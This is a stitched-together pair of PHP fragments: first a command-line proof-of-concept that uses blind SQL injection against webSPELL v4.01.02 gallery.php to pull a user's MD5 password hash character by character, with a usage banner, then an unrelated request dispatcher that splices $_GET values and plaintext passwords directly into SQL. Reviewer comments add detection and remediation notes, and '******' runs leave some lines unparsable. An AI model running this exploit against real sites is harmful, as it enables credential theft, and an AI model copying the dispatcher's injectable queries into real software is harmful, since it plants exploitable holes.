// Fragment of a command-line proof-of-concept for the webSPELL v4.01.02
// gallery.php SQL injection (named in the usage banner below). The `if` that
// opens this branch is outside the excerpt, so the braces do not balance here.
echo "exploiting...\n";
echo "md5-hash: ";
// One pass per character position of a 32-character digest (printed as "md5-hash").
for ($i = 1; $i <= 32; $i++) {
    $found = false;
    // First candidate range: ASCII 48..57, i.e. the digits '0'-'9'.
    $h = 48;
    while (!$found and $h <= 57) {
        // istrue() is defined outside this excerpt; presumably it sends one
        // request and reports whether position $i equals chr($h), i.e. it is
        // used as a yes/no (blind) oracle. TODO confirm against its definition.
        if (istrue($xpl, $host, $path, $prefix, $gid, $pid, $uid, $i, $h)) {
            $found = true;
            echo chr($h);
        }
        $h++;
    }
    if (!$found) {
        // Second candidate range: ASCII 97..122, i.e. lowercase 'a'-'z'.
        $h = 97;
        while (!$found and $h <= 122) {
            if (istrue($xpl, $host, $path, $prefix, $gid, $pid, $uid, $i, $h)) {
                $found = true;
                echo chr($h);
            }
            $h++;
        }
    }
    // If neither range matches, nothing is printed for this position and the
    // loop simply moves on, so the output can be shorter than 32 characters.
    //
    // NOTE(review): detection angle. The loop bounds allow up to 36 istrue()
    // calls per position, so at most 32 * 36 = 1152 calls per run. If each call
    // is one HTTP request (not visible here), that is a burst of near-identical
    // gallery.php requests from one client that differ only in a position and
    // a character code, which access-log or WAF rules can key on.
}
} else {
    // Usage banner, printed when the unseen condition is false; presumably an
    // argument-count check. Positional arguments per the banner: host, path,
    // table prefix, a valid gallery id, picture id and user id, optional proxy.
    echo "\n\n";
    echo "|=======webSPELL v4.01.02 gallery.php SQL Injection========\n";
    echo "|\n";
    echo "|Syntax: php " . $_SERVER['argv'][0] . " [host] [path] [prefix] [valid GalleryID] [valid PicID] [valid UserID] ([Proxy-IP:Port])\n|\n";
    echo "|Example (with Proxy): php " . $_SERVER['argv'][0] . " localhost /webspell/ webs_ 1 1 1 192.168.1.1:80\n|\n";
    echo "|Example (without Proxy): php " . $_SERVER['argv'][0] . " localhost /webspell/ webs_ 1 1 1\n|\n";
    // NOTE(review): the claim below that magic_quotes / register_globals make
    // no difference is consistent with injection into an unquoted (numeric)
    // SQL context, where quote escaping gives no protection. The vulnerable
    // query is not shown here. The server-side remedy is to bind the id
    // parameters in gallery.php, or cast them to integers, before they reach SQL.
    echo "|Notes: This exploit works regardless of the PHP security settings (magic_quotes, register_globals)\n";
// Fragment of a request dispatcher: a chain of nested if/else branches chosen
// by which $_GET parameters are present. The excerpt begins inside an earlier
// branch and ends inside a later one, so the braces do not balance here.
// NOTE(review): the `******` runs are part of the page as extracted and leave
// several expressions unparsable; they appear to stand where a `. $_GET[`
// concatenation was. Confirm against the original file.
// NOTE(review): every branch below splices $_GET values directly into the
// WHERE text handed to istrue() / select() (both defined outside this
// excerpt). Unless those helpers bind or escape their arguments, each of these
// parameters is an SQL injection point. Use prepared statements with bound
// values, and validate numeric ids as integers before use.
if (istrue($conn, "*", "as_Vote", "user = "******"user"] . " AND target_id = " . $_GET["ispostliked"] . " AND target = 'as_Post'", "target_id", $_GET["ispostliked"])) {
    echo "true";
} else {
    echo "false";
}
} else {
    if (isset($_GET["iscommentliked"]) && isset($_GET["user"])) {
        //-------------------is comment liked
        if (istrue($conn, "*", "as_Vote", "user = "******"user"] . " AND target_id = " . $_GET["iscommentliked"] . " AND target = 'as_Comment'", "target_id", $_GET["iscommentliked"])) {
            echo "true";
        } else {
            echo "false";
        }
    } else {
        if (isset($_GET["username"]) && isset($_GET["password"])) {
            // Login check: prints the user's id on success, "false" otherwise.
            // NOTE(review): username and password arrive as query-string
            // parameters, so they are likely to end up in access logs and
            // proxy logs. The raw password is passed to istrue() next to the
            // `password` column, which suggests a comparison against a stored
            // plaintext value rather than password_verify(). Confirm in istrue().
            if (istrue($conn, "password", "as_User", "username = '******'username'] . "'", "password", $_GET["password"])) { echo select($conn, "id", "as_User", "username = '******'username'] . "'")->fetch_assoc()['id'];
            } else {
                echo "false";
            }
        } else {
            if (isset($_GET['comments'])) {
                // Lists the comments of one project, joined with the author's
                // username; the project id comes unvalidated from the request.
                $result = select($conn, "as_Comment.id, as_Comment.`text`, as_User.`username`", "as_Comment, as_User", "as_User.`id` = as_Comment.`user_id` AND as_Comment.`Project_id` = " . $_GET['comments']);
                $arrContainer = array();
                while ($row = $result->fetch_assoc()) {
                    // One extra COUNT(*) query per comment row. The id spliced
                    // in here comes from the previous result set, not from the
                    // request.
                    $row['votes'] = $conn->query("SELECT COUNT(*) AS 'votes' FROM as_Vote WHERE target = 'as_Comment' AND target_id = " . $row['id'])->fetch_assoc()['votes'];
                    $arrContainer[] = $row;
                }
                // Emits the collected rows, each with its added 'votes' count, as JSON.
                echo json_encode($arrContainer);
            } else {
                if (isset($_GET["votepost"]) && isset($_GET["user"])) {